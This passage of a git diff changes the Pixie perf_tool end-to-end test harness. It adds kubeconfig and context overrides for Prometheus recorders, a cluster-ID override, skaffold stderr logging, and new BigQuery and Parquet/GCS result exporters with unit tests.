string(dAtA[iNdEx:postIndex]) + iNdEx = postIndex + case 9: + if wireType != 2 { + return fmt.Errorf("proto: wrong wireType = %d for field Name", wireType) + } + var stringLen uint64 + for shift := uint(0); ; shift += 7 { + if shift >= 64 { + return ErrIntOverflowExperiment + } + if iNdEx >= l { + return io.ErrUnexpectedEOF + } + b := dAtA[iNdEx] + iNdEx++ + stringLen |= uint64(b&0x7F) << shift + if b < 0x80 { + break + } + } + intStringLen := int(stringLen) + if intStringLen < 0 { + return ErrInvalidLengthExperiment + } + postIndex := iNdEx + intStringLen + if postIndex < 0 { + return ErrInvalidLengthExperiment + } + if postIndex > l { + return io.ErrUnexpectedEOF + } + m.Name = string(dAtA[iNdEx:postIndex]) + iNdEx = postIndex default: iNdEx = preIndex skippy, err := skipExperiment(dAtA[iNdEx:]) diff --git a/src/e2e_test/perf_tool/experimentpb/experiment.proto b/src/e2e_test/perf_tool/experimentpb/experiment.proto index d5482d5d249..ed9dce28339 100644 --- a/src/e2e_test/perf_tool/experimentpb/experiment.proto +++ b/src/e2e_test/perf_tool/experimentpb/experiment.proto @@ -124,6 +124,11 @@ message PatchTarget { message PrerenderedDeploy { repeated string yaml_paths = 1 [ (gogoproto.customname) = "YAMLPaths" ]; repeated PatchSpec patches = 2; + // If true, the step will not return the deployed namespace in its cleanup list, + // so workload.Close() will not delete that namespace on teardown. Use this for + // resources applied into namespaces the experiment does not own (e.g. a + // RoleBinding in kube-system that has to live there for API aggregation auth). + bool skip_namespace_delete = 3; } // SkaffoldDeploy specifies how to use skaffold to deploy a component. SkaffoldDeploy is currently @@ -220,6 +225,15 @@ message PrometheusScrapeSpec { // How often to scrape the matched pods. google.protobuf.Duration scrape_period = 5; map metric_names = 6; + // Optional path to a kubeconfig file for connecting to a different cluster. + // If empty, the experiment's default cluster context is used. + string kubeconfig_path = 7; + // Optional kubectl context name to use within the kubeconfig. + // If empty, the current-context from the kubeconfig is used. + string kube_context = 8; + // Identifier for this prometheus recorder, used by the CLI to target + // recorders with kubeconfig/kube_context overrides at runtime. + string name = 9; } // ClusterSpec specifies the type and size of cluster an experiment should run on. diff --git a/src/e2e_test/perf_tool/pkg/cluster/context.go b/src/e2e_test/perf_tool/pkg/cluster/context.go index bd79bf433f3..c274a6726b0 100644 --- a/src/e2e_test/perf_tool/pkg/cluster/context.go +++ b/src/e2e_test/perf_tool/pkg/cluster/context.go @@ -53,6 +53,36 @@ func NewContextFromPath(kubeconfigPath string) (*Context, error) { }, nil } +// NewContextFromOptions creates a new Context using the specified kubeconfig path and/or context name. +// If kubeconfigPath is empty, the default kubeconfig path is used. +// If kubeContext is empty, the current-context from the kubeconfig is used. +func NewContextFromOptions(kubeconfigPath string, kubeContext string) (*Context, error) { + loadingRules := &clientcmd.ClientConfigLoadingRules{} + if kubeconfigPath != "" { + loadingRules.ExplicitPath = kubeconfigPath + } else { + loadingRules = clientcmd.NewDefaultClientConfigLoadingRules() + } + overrides := &clientcmd.ConfigOverrides{} + if kubeContext != "" { + overrides.CurrentContext = kubeContext + } + config := clientcmd.NewNonInteractiveDeferredLoadingClientConfig(loadingRules, overrides) + restConfig, err := config.ClientConfig() + if err != nil { + return nil, err + } + if kubeconfigPath == "" { + kubeconfigPath = clientcmd.RecommendedHomeFile + } + clientset := k8s.GetClientset(restConfig) + return &Context{ + configPath: kubeconfigPath, + restConfig: restConfig, + clientset: clientset, + }, nil +} + // NewContextFromConfig writes the given kubeconfig to a file, and the returns NewContextFromPath for that file. func NewContextFromConfig(kubeconfig []byte) (*Context, error) { tmpFile, err := os.CreateTemp("", "*") diff --git a/src/e2e_test/perf_tool/pkg/deploy/checks/BUILD.bazel b/src/e2e_test/perf_tool/pkg/deploy/checks/BUILD.bazel index 22c706e9bee..a4205b00b8c 100644 --- a/src/e2e_test/perf_tool/pkg/deploy/checks/BUILD.bazel +++ b/src/e2e_test/perf_tool/pkg/deploy/checks/BUILD.bazel @@ -34,6 +34,7 @@ go_library( "//src/e2e_test/perf_tool/pkg/pixie", "@com_github_cenkalti_backoff_v4//:backoff", "@com_github_sirupsen_logrus//:logrus", + "@io_k8s_api//core/v1:core", "@io_k8s_apimachinery//pkg/apis/meta/v1:meta", ], ) diff --git a/src/e2e_test/perf_tool/pkg/deploy/checks/k8s_healthcheck.go b/src/e2e_test/perf_tool/pkg/deploy/checks/k8s_healthcheck.go index fda494dc839..08363f43abe 100644 --- a/src/e2e_test/perf_tool/pkg/deploy/checks/k8s_healthcheck.go +++ b/src/e2e_test/perf_tool/pkg/deploy/checks/k8s_healthcheck.go @@ -25,6 +25,7 @@ import ( "github.com/cenkalti/backoff/v4" log "github.com/sirupsen/logrus" + v1 "k8s.io/api/core/v1" metav1 "k8s.io/apimachinery/pkg/apis/meta/v1" "px.dev/pixie/src/e2e_test/perf_tool/experimentpb" @@ -68,6 +69,15 @@ func (hc *k8sHealthCheck) Wait(ctx context.Context, clusterCtx *cluster.Context, ) } for _, pod := range pl.Items { + // CronJob pods that exited 0 stay around in phase Succeeded + // (Kubernetes keeps them per successfulJobsHistoryLimit) and + // their containers report Ready: false forever. They are + // "done", not "not ready" — skip. Phase Failed is intentionally + // NOT skipped: a failed CronJob run is a real signal we want + // the healthcheck to surface, not paper over. + if pod.Status.Phase == v1.PodSucceeded { + continue + } for _, cs := range pod.Status.InitContainerStatuses { if cs.State.Terminated == nil { return fmt.Errorf( diff --git a/src/e2e_test/perf_tool/pkg/deploy/steps/prerendered.go b/src/e2e_test/perf_tool/pkg/deploy/steps/prerendered.go index a05960b6de2..ca7dbf6ef3e 100644 --- a/src/e2e_test/perf_tool/pkg/deploy/steps/prerendered.go +++ b/src/e2e_test/perf_tool/pkg/deploy/steps/prerendered.go @@ -75,6 +75,9 @@ func (p *prerenderedDeployImpl) Deploy(clusterCtx *cluster.Context) ([]string, e if err := p.r.deploy(clusterCtx); err != nil { return nil, err } + if p.spec.SkipNamespaceDelete { + return nil, nil + } ns, err := p.r.getNamespace() if err != nil { return nil, err diff --git a/src/e2e_test/perf_tool/pkg/deploy/steps/px.go b/src/e2e_test/perf_tool/pkg/deploy/steps/px.go index 5aedff51f92..c290369dff6 100644 --- a/src/e2e_test/perf_tool/pkg/deploy/steps/px.go +++ b/src/e2e_test/perf_tool/pkg/deploy/steps/px.go @@ -20,9 +20,11 @@ package steps import ( "fmt" + "os" "strings" "github.com/gofrs/uuid" + log "github.com/sirupsen/logrus" "px.dev/pixie/src/e2e_test/perf_tool/experimentpb" "px.dev/pixie/src/e2e_test/perf_tool/pkg/cluster" @@ -74,20 +76,43 @@ func (px *pxDeployImpl) Deploy(clusterCtx *cluster.Context) ([]string, error) { if hasElem(args, "deploy") && !hasElem(args, "-y") { args = append(args, "-y") } - if _, err := px.pxCtx.RunPXCmd(clusterCtx, args...); err != nil { - return nil, err - } - if px.spec.SetClusterID { - clusterIDBytes, err := px.pxCtx.RunPXCmd(clusterCtx, "get", "cluster", "--id") - if err != nil { + // Empty Args is used by callers that only want SetClusterID against a + // pre-existing Pixie deployment (e.g. the SOC_VIZIER_EXISTING path in + // the sovereign-soc suite). Skip the bare `px` invocation in that case + // — it would otherwise just print help and clutter the trace log. + if len(args) > 0 { + if _, err := px.pxCtx.RunPXCmd(clusterCtx, args...); err != nil { return nil, err } - clusterIDStr := strings.Trim(string(clusterIDBytes), " \n") - id, err := uuid.FromString(clusterIDStr) - if err != nil { - return nil, err + } + if px.spec.SetClusterID { + // Allow a direct UUID override via env. Useful when the px CLI + // in this runner has no cluster selected and `px get cluster --id` + // would otherwise return empty or a stale row. + if override := strings.TrimSpace(os.Getenv("SOC_VIZIER_CLUSTER_ID")); override != "" { + id, err := uuid.FromString(override) + if err != nil { + return nil, fmt.Errorf("SOC_VIZIER_CLUSTER_ID %q is not a valid UUID: %w", override, err) + } + log.WithField("source", "env").WithField("cluster_id", id.String()).Info("Binding existing Vizier cluster ID") + px.pxCtx.SetClusterID(id) + } else { + clusterIDBytes, err := px.pxCtx.RunPXCmd(clusterCtx, "get", "cluster", "--id") + if err != nil { + return nil, fmt.Errorf("px get cluster --id failed: %w", err) + } + clusterIDStr := strings.Trim(string(clusterIDBytes), " \n") + log.WithField("source", "px get cluster --id").WithField("raw", clusterIDStr).Info("Resolving existing Vizier cluster ID") + id, err := uuid.FromString(clusterIDStr) + if err != nil { + return nil, fmt.Errorf("px get cluster --id returned %q which is not a UUID: %w", clusterIDStr, err) + } + if (id == uuid.UUID{}) { + return nil, fmt.Errorf("px get cluster --id returned the zero UUID; the cluster is not registered (or the px CLI has no cluster selected). Set SOC_VIZIER_CLUSTER_ID to override") + } + log.WithField("cluster_id", id.String()).Info("Binding existing Vizier cluster ID") + px.pxCtx.SetClusterID(id) } - px.pxCtx.SetClusterID(id) } // We don't know what namespaces a given `px` command will create, so we rely on the user to set them in the spec. return px.spec.Namespaces, nil diff --git a/src/e2e_test/perf_tool/pkg/deploy/steps/skaffold.go b/src/e2e_test/perf_tool/pkg/deploy/steps/skaffold.go index edbac73a2ef..3216d73d009 100644 --- a/src/e2e_test/perf_tool/pkg/deploy/steps/skaffold.go +++ b/src/e2e_test/perf_tool/pkg/deploy/steps/skaffold.go @@ -21,6 +21,7 @@ package steps import ( "bytes" "fmt" + "io" "os" "os/exec" "strings" @@ -34,6 +35,7 @@ import ( type skaffoldDeployImpl struct { spec *experimentpb.SkaffoldDeploy containerRegistryRepo string + stderrFile string r *renderedYAML } @@ -41,10 +43,13 @@ type skaffoldDeployImpl struct { var _ DeployStep = &skaffoldDeployImpl{} // NewSkaffoldDeploy returns a new DeployStep which deploys a stage of a workload using skaffold. -func NewSkaffoldDeploy(spec *experimentpb.SkaffoldDeploy, containerRegistryRepo string) DeployStep { +// If stderrFile is non-empty, skaffold's stderr is appended to that file in addition to +// the perf_tool process's stderr. +func NewSkaffoldDeploy(spec *experimentpb.SkaffoldDeploy, containerRegistryRepo, stderrFile string) DeployStep { return &skaffoldDeployImpl{ spec: spec, containerRegistryRepo: containerRegistryRepo, + stderrFile: stderrFile, } } @@ -85,6 +90,21 @@ func (s *skaffoldDeployImpl) Deploy(clusterCtx *cluster.Context) ([]string, erro return []string{ns}, nil } +// stderrSink returns the io.Writer to use for skaffold's stderr and a cleanup +// func. When stderrFile is set, output is teed to both os.Stderr and the file +// (opened in append mode so multiple skaffold invocations all land in the same +// log). +func (s *skaffoldDeployImpl) stderrSink() (io.Writer, func(), error) { + if s.stderrFile == "" { + return os.Stderr, func() {}, nil + } + f, err := os.OpenFile(s.stderrFile, os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0644) + if err != nil { + return nil, nil, fmt.Errorf("failed to open skaffold stderr file %q: %w", s.stderrFile, err) + } + return io.MultiWriter(os.Stderr, f), func() { f.Close() }, nil +} + func (s *skaffoldDeployImpl) runSkaffoldBuild() ([]byte, error) { var buildArtifacts bytes.Buffer buildArgs := []string{ @@ -95,8 +115,13 @@ func (s *skaffoldDeployImpl) runSkaffoldBuild() ([]byte, error) { } buildArgs = append(buildArgs, s.spec.SkaffoldArgs...) log.Tracef("Running `skaffold %s` ...", strings.Join(buildArgs, " ")) + stderr, cleanup, err := s.stderrSink() + if err != nil { + return nil, err + } + defer cleanup() cmd := exec.Command("skaffold", buildArgs...) - cmd.Stderr = os.Stderr + cmd.Stderr = stderr cmd.Stdout = &buildArtifacts if err := cmd.Run(); err != nil { return nil, fmt.Errorf("failed to run `skaffold %s`: %w", strings.Join(buildArgs, " "), err) @@ -114,9 +139,14 @@ func (s *skaffoldDeployImpl) runSkaffoldRender(buildArtifacts []byte) ([]byte, e } renderArgs = append(renderArgs, s.spec.SkaffoldArgs...) log.Tracef("Running `skaffold %s` ...", strings.Join(renderArgs, " ")) + stderr, cleanup, err := s.stderrSink() + if err != nil { + return nil, err + } + defer cleanup() cmd := exec.Command("skaffold", renderArgs...) cmd.Stdin = bytes.NewReader(buildArtifacts) - cmd.Stderr = os.Stderr + cmd.Stderr = stderr cmd.Stdout = &renderedYAMLs if err := cmd.Run(); err != nil { return nil, fmt.Errorf("failed to run `skaffold %s`: %w", strings.Join(renderArgs, " "), err) diff --git a/src/e2e_test/perf_tool/pkg/deploy/workload.go b/src/e2e_test/perf_tool/pkg/deploy/workload.go index ef1e1fc8170..9b09d28c619 100644 --- a/src/e2e_test/perf_tool/pkg/deploy/workload.go +++ b/src/e2e_test/perf_tool/pkg/deploy/workload.go @@ -54,14 +54,17 @@ type workloadImpl struct { } // NewWorkload creates a new Workload capable of deploying according to the spec given. -func NewWorkload(pxCtx *pixie.Context, containerRegistryRepo string, spec *experimentpb.WorkloadSpec) (Workload, error) { +// skaffoldStderrFile, when non-empty, is the path to which skaffold's stderr is appended +// for any skaffold-based deploy steps; pass "" to leave skaffold's stderr going only to +// the perf_tool process's stderr. +func NewWorkload(pxCtx *pixie.Context, containerRegistryRepo, skaffoldStderrFile string, spec *experimentpb.WorkloadSpec) (Workload, error) { deploySteps := make([]steps.DeployStep, len(spec.DeploySteps)) for i, stepSpec := range spec.DeploySteps { switch stepSpec.DeployType.(type) { case *experimentpb.DeployStep_Prerendered: deploySteps[i] = steps.NewPrerenderedDeploy(stepSpec.GetPrerendered()) case *experimentpb.DeployStep_Skaffold: - deploySteps[i] = steps.NewSkaffoldDeploy(stepSpec.GetSkaffold(), containerRegistryRepo) + deploySteps[i] = steps.NewSkaffoldDeploy(stepSpec.GetSkaffold(), containerRegistryRepo, skaffoldStderrFile) case *experimentpb.DeployStep_Px: deploySteps[i] = steps.NewPxDeploy(pxCtx, stepSpec.GetPx()) } diff --git a/src/e2e_test/perf_tool/pkg/exporter/BUILD.bazel b/src/e2e_test/perf_tool/pkg/exporter/BUILD.bazel new file mode 100644 index 00000000000..a3e37f28f0c --- /dev/null +++ b/src/e2e_test/perf_tool/pkg/exporter/BUILD.bazel @@ -0,0 +1,51 @@ +# Copyright 2018- The Pixie Authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +# SPDX-License-Identifier: Apache-2.0 + +load("@io_bazel_rules_go//go:def.bzl", "go_library") +load("//bazel:pl_build_system.bzl", "pl_go_test") + +go_library( + name = "exporter", + srcs = [ + "bq_exporter.go", + "exporter.go", + "parquet_exporter.go", + "parquet_local_exporter.go", + ], + importpath = "px.dev/pixie/src/e2e_test/perf_tool/pkg/exporter", + visibility = ["//visibility:public"], + deps = [ + "//src/e2e_test/perf_tool/pkg/metrics", + "//src/shared/bq", + "@com_github_gofrs_uuid//:uuid", + "@com_github_parquet_go_parquet_go//:parquet-go", + "@com_github_sirupsen_logrus//:logrus", + "@com_google_cloud_go_storage//:storage", + ], +) + +pl_go_test( + name = "exporter_test", + srcs = ["parquet_exporter_test.go"], + embed = [":exporter"], + deps = [ + "//src/e2e_test/perf_tool/pkg/metrics", + "@com_github_gofrs_uuid//:uuid", + "@com_github_parquet_go_parquet_go//:parquet-go", + "@com_github_stretchr_testify//assert", + "@com_github_stretchr_testify//require", + ], +) diff --git a/src/e2e_test/perf_tool/pkg/run/row.go b/src/e2e_test/perf_tool/pkg/exporter/bq_exporter.go similarity index 58% rename from src/e2e_test/perf_tool/pkg/run/row.go rename to src/e2e_test/perf_tool/pkg/exporter/bq_exporter.go index 17959d97d78..023db03c4f4 100644 --- a/src/e2e_test/perf_tool/pkg/run/row.go +++ b/src/e2e_test/perf_tool/pkg/exporter/bq_exporter.go @@ -16,15 +16,18 @@ * SPDX-License-Identifier: Apache-2.0 */ -package run +package exporter import ( + "context" "encoding/json" "time" "github.com/gofrs/uuid" + log "github.com/sirupsen/logrus" "px.dev/pixie/src/e2e_test/perf_tool/pkg/metrics" + "px.dev/pixie/src/shared/bq" ) // ResultRow represents a single datapoint for a single metric, to be stored in bigquery. @@ -51,7 +54,7 @@ type SpecRow struct { CommitTopoOrder int `bigquery:"commit_topo_order"` } -// MetricsRowToResultRow converts a `metrics.ResultRow` into a `bq.ResultRow`. +// MetricsRowToResultRow converts a `metrics.ResultRow` into a `ResultRow`. func MetricsRowToResultRow(expID uuid.UUID, row *metrics.ResultRow) (*ResultRow, error) { encodedTags, err := json.Marshal(row.Tags) if err != nil { @@ -65,3 +68,61 @@ func MetricsRowToResultRow(expID uuid.UUID, row *metrics.ResultRow) (*ResultRow, Tags: string(encodedTags), }, nil } + +// BQExporter exports experiment results and specs to BigQuery. +type BQExporter struct { + resultTable *bq.Table + specTable *bq.Table +} + +// NewBQExporter creates a new BigQuery exporter. +func NewBQExporter(resultTable, specTable *bq.Table) *BQExporter { + return &BQExporter{ + resultTable: resultTable, + specTable: specTable, + } +} + +// ExportResults consumes metrics from resultCh and inserts them into BigQuery in batches. +func (e *BQExporter) ExportResults(ctx context.Context, expID uuid.UUID, resultCh <-chan *metrics.ResultRow) error { + bqCh := make(chan interface{}) + defer close(bqCh) + + inserter := &bq.BatchInserter{ + Table: e.resultTable, + BatchSize: 512, + PushTimeout: 2 * time.Minute, + } + go inserter.Run(bqCh) + + for row := range resultCh { + bqRow, err := MetricsRowToResultRow(expID, row) + if err != nil { + log.WithError(err).Error("Failed to convert result row") + continue + } + bqCh <- bqRow + } + return nil +} + +// ExportSpec writes the experiment spec to BigQuery on experiment success. +func (e *BQExporter) ExportSpec(ctx context.Context, expID uuid.UUID, encodedSpec string, commitTopoOrder int) error { + specRow := &SpecRow{ + ExperimentID: expID.String(), + Spec: encodedSpec, + CommitTopoOrder: commitTopoOrder, + } + + inserter := e.specTable.Inserter() + inserter.SkipInvalidRows = false + + putCtx, cancel := context.WithTimeout(ctx, 5*time.Minute) + defer cancel() + return inserter.Put(putCtx, specRow) +} + +// Close is a no-op for the BigQuery exporter. +func (e *BQExporter) Close() error { + return nil +} diff --git a/src/e2e_test/perf_tool/pkg/exporter/exporter.go b/src/e2e_test/perf_tool/pkg/exporter/exporter.go new file mode 100644 index 00000000000..c89d6898032 --- /dev/null +++ b/src/e2e_test/perf_tool/pkg/exporter/exporter.go @@ -0,0 +1,37 @@ +/* + * Copyright 2018- The Pixie Authors. + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + * + * SPDX-License-Identifier: Apache-2.0 + */ + +package exporter + +import ( + "context" + + "github.com/gofrs/uuid" + + "px.dev/pixie/src/e2e_test/perf_tool/pkg/metrics" +) + +// Exporter handles exporting experiment results and specs to a storage backend. +type Exporter interface { + // ExportResults consumes metrics from resultCh until it closes, then flushes. + ExportResults(ctx context.Context, expID uuid.UUID, resultCh <-chan *metrics.ResultRow) error + // ExportSpec writes the experiment spec for a successful experiment. + ExportSpec(ctx context.Context, expID uuid.UUID, encodedSpec string, commitTopoOrder int) error + // Close releases any resources held by the exporter. + Close() error +} diff --git a/src/e2e_test/perf_tool/pkg/exporter/parquet_exporter.go b/src/e2e_test/perf_tool/pkg/exporter/parquet_exporter.go new file mode 100644 index 00000000000..c5fe259e93a --- /dev/null +++ b/src/e2e_test/perf_tool/pkg/exporter/parquet_exporter.go @@ -0,0 +1,285 @@ +/* + * Copyright 2018- The Pixie Authors. + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + * + * SPDX-License-Identifier: Apache-2.0 + */ + +package exporter + +import ( + "context" + "fmt" + "io" + "os" + "sort" + "time" + + "cloud.google.com/go/storage" + "github.com/gofrs/uuid" + "github.com/parquet-go/parquet-go" + log "github.com/sirupsen/logrus" + + "px.dev/pixie/src/e2e_test/perf_tool/pkg/metrics" +) + +type bufferedRow struct { + ExperimentID string + Timestamp time.Time + Name string + Value float64 + Tags map[string]string +} + +// uploadFunc is the signature for uploading a local file to a remote path. +type uploadFunc func(ctx context.Context, objectPath string, localPath string) error + +// ParquetGCSExporter exports experiment results as parquet files to GCS. +type ParquetGCSExporter struct { + bucket string + prefix string + batchSize int + gcsClient *storage.Client + upload uploadFunc +} + +// NewParquetGCSExporter creates a new Parquet+GCS exporter. +func NewParquetGCSExporter(ctx context.Context, bucket, prefix string, batchSize int) (*ParquetGCSExporter, error) { + client, err := storage.NewClient(ctx) + if err != nil { + return nil, fmt.Errorf("failed to create GCS client: %w", err) + } + e := &ParquetGCSExporter{ + bucket: bucket, + prefix: prefix, + batchSize: batchSize, + gcsClient: client, + } + e.upload = e.uploadToGCS + return e, nil +} + +// ExportResults consumes metrics from resultCh and writes them as batched parquet files to GCS. +func (e *ParquetGCSExporter) ExportResults(ctx context.Context, expID uuid.UUID, resultCh <-chan *metrics.ResultRow) error { + now := time.Now() + basePath := e.gcsPath(now, expID) + seqNum := 0 + batch := make([]bufferedRow, 0, e.batchSize) + + for row := range resultCh { + batch = append(batch, bufferedRow{ + ExperimentID: expID.String(), + Timestamp: row.Timestamp, + Name: row.Name, + Value: row.Value, + Tags: row.Tags, + }) + if len(batch) >= e.batchSize { + if err := e.flushBatch(ctx, basePath, seqNum, batch); err != nil { + return err + } + seqNum++ + batch = batch[:0] + } + } + + if len(batch) > 0 { + if err := e.flushBatch(ctx, basePath, seqNum, batch); err != nil { + return err + } + } + return nil +} + +// ExportSpec writes the experiment spec as a parquet file to GCS. +func (e *ParquetGCSExporter) ExportSpec(ctx context.Context, expID uuid.UUID, encodedSpec string, commitTopoOrder int) error { + type specRow struct { + ExperimentID string `parquet:"experiment_id"` + Spec string `parquet:"spec"` + CommitTopoOrder int64 `parquet:"commit_topo_order"` + } + + tmpFile, err := os.CreateTemp("", "spec-*.parquet") + if err != nil { + return fmt.Errorf("failed to create temp file for spec parquet: %w", err) + } + tmpPath := tmpFile.Name() + defer os.Remove(tmpPath) + + writer := parquet.NewGenericWriter[specRow](tmpFile) + _, err = writer.Write([]specRow{{ + ExperimentID: expID.String(), + Spec: encodedSpec, + CommitTopoOrder: int64(commitTopoOrder), + }}) + if err != nil { + tmpFile.Close() + return fmt.Errorf("failed to write spec parquet: %w", err) + } + if err := writer.Close(); err != nil { + tmpFile.Close() + return fmt.Errorf("failed to close spec parquet writer: %w", err) + } + tmpFile.Close() + + now := time.Now() + gcsPath := fmt.Sprintf("%s/spec.parquet", e.gcsPath(now, expID)) + return e.upload(ctx, gcsPath, tmpPath) +} + +// Close releases resources held by the exporter. +func (e *ParquetGCSExporter) Close() error { + return e.gcsClient.Close() +} + +func (e *ParquetGCSExporter) gcsPath(t time.Time, expID uuid.UUID) string { + datePath := t.Format("2006/01/02") + if e.prefix != "" { + return fmt.Sprintf("%s/%s/%s", e.prefix, datePath, expID.String()) + } + return fmt.Sprintf("%s/%s", datePath, expID.String()) +} + +func (e *ParquetGCSExporter) flushBatch(ctx context.Context, basePath string, seqNum int, rows []bufferedRow) error { + tagKeys := collectTagKeys(rows) + schema := buildResultSchema(tagKeys) + + tmpFile, err := os.CreateTemp("", "results-*.parquet") + if err != nil { + return fmt.Errorf("failed to create temp file for parquet: %w", err) + } + tmpPath := tmpFile.Name() + defer os.Remove(tmpPath) + + writer := parquet.NewWriter(tmpFile, schema) + + for _, row := range rows { + parquetRow := buildResultRow(row, tagKeys) + if _, err := writer.WriteRows([]parquet.Row{parquetRow}); err != nil { + tmpFile.Close() + return fmt.Errorf("failed to write parquet row: %w", err) + } + } + + if err := writer.Close(); err != nil { + tmpFile.Close() + return fmt.Errorf("failed to close parquet writer: %w", err) + } + tmpFile.Close() + + gcsPath := fmt.Sprintf("%s/results_%04d.parquet", basePath, seqNum) + log.WithField("gcs_path", gcsPath).WithField("rows", len(rows)).Info("Uploading parquet batch") + return e.upload(ctx, gcsPath, tmpPath) +} + +func (e *ParquetGCSExporter) uploadToGCS(ctx context.Context, objectPath string, localPath string) error { + f, err := os.Open(localPath) + if err != nil { + return fmt.Errorf("failed to open temp file for upload: %w", err) + } + defer f.Close() + + obj := e.gcsClient.Bucket(e.bucket).Object(objectPath) + wc := obj.NewWriter(ctx) + if _, err := io.Copy(wc, f); err != nil { + wc.Close() + return fmt.Errorf("failed to upload to GCS: %w", err) + } + if err := wc.Close(); err != nil { + return fmt.Errorf("failed to finalize GCS upload: %w", err) + } + return nil +} + +// collectTagKeys returns a sorted list of unique tag keys across all rows. +func collectTagKeys(rows []bufferedRow) []string { + keySet := make(map[string]struct{}) + for _, row := range rows { + for k := range row.Tags { + keySet[k] = struct{}{} + } + } + keys := make([]string, 0, len(keySet)) + for k := range keySet { + keys = append(keys, k) + } + sort.Strings(keys) + return keys +} + +// buildResultSchema creates a parquet schema with fixed columns plus dynamic tag columns. +func buildResultSchema(tagKeys []string) *parquet.Schema { + group := parquet.Group{ + "experiment_id": parquet.String(), + "timestamp": parquet.Timestamp(parquet.Millisecond), + "name": parquet.String(), + "value": parquet.Leaf(parquet.DoubleType), + } + for _, key := range tagKeys { + group["tag_"+key] = parquet.Optional(parquet.String()) + } + return parquet.NewSchema("result", group) +} + +// buildResultRow constructs a parquet.Row from a bufferedRow with the given tag key ordering. +// Column ordering matches the schema's sorted field order (alphabetical by field name). +func buildResultRow(row bufferedRow, tagKeys []string) parquet.Row { + // parquet.Group sorts fields alphabetically. We must produce values in that order. + // Build named values, sort them, then assign column indices. + + type colEntry struct { + name string + val parquet.Value + optional bool + } + + entries := []colEntry{ + {"experiment_id", parquet.ValueOf(row.ExperimentID), false}, + {"name", parquet.ValueOf(row.Name), false}, + {"timestamp", parquet.Int64Value(row.Timestamp.UnixMilli()), false}, + {"value", parquet.ValueOf(row.Value), false}, + } + + for _, key := range tagKeys { + colName := "tag_" + key + if v, ok := row.Tags[key]; ok { + entries = append(entries, colEntry{colName, parquet.ValueOf(v), true}) + } else { + // Null value for missing optional tag. + entries = append(entries, colEntry{colName, parquet.Value{}, true}) + } + } + + // Sort by column name to match schema field order. + sort.Slice(entries, func(i, j int) bool { + return entries[i].name < entries[j].name + }) + + parquetRow := make(parquet.Row, len(entries)) + for i, e := range entries { + if e.optional { + if e.val.IsNull() { + // Null optional: definitionLevel=0 + parquetRow[i] = parquet.Value{}.Level(0, 0, i) + } else { + // Present optional: definitionLevel=1 + parquetRow[i] = e.val.Level(0, 1, i) + } + } else { + // Required: definitionLevel=0 + parquetRow[i] = e.val.Level(0, 0, i) + } + } + return parquetRow +} diff --git a/src/e2e_test/perf_tool/pkg/exporter/parquet_exporter_test.go b/src/e2e_test/perf_tool/pkg/exporter/parquet_exporter_test.go new file mode 100644 index 00000000000..e20816bfd5b --- /dev/null +++ b/src/e2e_test/perf_tool/pkg/exporter/parquet_exporter_test.go @@ -0,0 +1,500 @@ +/* + * Copyright 2018- The Pixie Authors. + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + * + * SPDX-License-Identifier: Apache-2.0 + */ + +package exporter + +import ( + "context" + "errors" + "fmt" + "io" + "os" + "path/filepath" + "sort" + "strings" + "testing" + "time" + + "github.com/gofrs/uuid" + "github.com/parquet-go/parquet-go" + "github.com/stretchr/testify/assert" + "github.com/stretchr/testify/require" + + "px.dev/pixie/src/e2e_test/perf_tool/pkg/metrics" +) + +func TestCollectTagKeys(t *testing.T) { + rows := []bufferedRow{ + {Tags: map[string]string{"pod": "pod-1", "node_name": "node-1"}}, + {Tags: map[string]string{"pod": "pod-2", "instance": "inst-1"}}, + {Tags: map[string]string{}}, + } + + keys := collectTagKeys(rows) + + assert.Equal(t, []string{"instance", "node_name", "pod"}, keys) +} + +func TestCollectTagKeys_Empty(t *testing.T) { + rows := []bufferedRow{ + {Tags: map[string]string{}}, + } + + keys := collectTagKeys(rows) + + assert.Empty(t, keys) +} + +func TestBuildResultSchema(t *testing.T) { + tagKeys := []string{"node_name", "pod"} + + schema := buildResultSchema(tagKeys) + + fields := schema.Fields() + fieldNames := make([]string, len(fields)) + for i, f := range fields { + fieldNames[i] = f.Name() + } + sort.Strings(fieldNames) + + assert.Equal(t, []string{ + "experiment_id", + "name", + "tag_node_name", + "tag_pod", + "timestamp", + "value", + }, fieldNames) +} + +func TestBuildResultRow_AllTagsPresent(t *testing.T) { + ts := time.Date(2026, 4, 15, 10, 30, 0, 0, time.UTC) + row := bufferedRow{ + ExperimentID: "test-id", + Timestamp: ts, + Name: "cpu_usage", + Value: 42.5, + Tags: map[string]string{"pod": "pod-1", "node_name": "node-1"}, + } + tagKeys := []string{"node_name", "pod"} + + parquetRow := buildResultRow(row, tagKeys) + + // Schema sorts fields alphabetically: + // experiment_id, name, tag_node_name, tag_pod, timestamp, value + assert.Equal(t, 6, len(parquetRow)) + + // Verify column indices are sequential. + for i, v := range parquetRow { + assert.Equal(t, i, v.Column(), "column index mismatch at position %d", i) + } +} + +func TestBuildResultRow_MissingTag(t *testing.T) { + ts := time.Date(2026, 4, 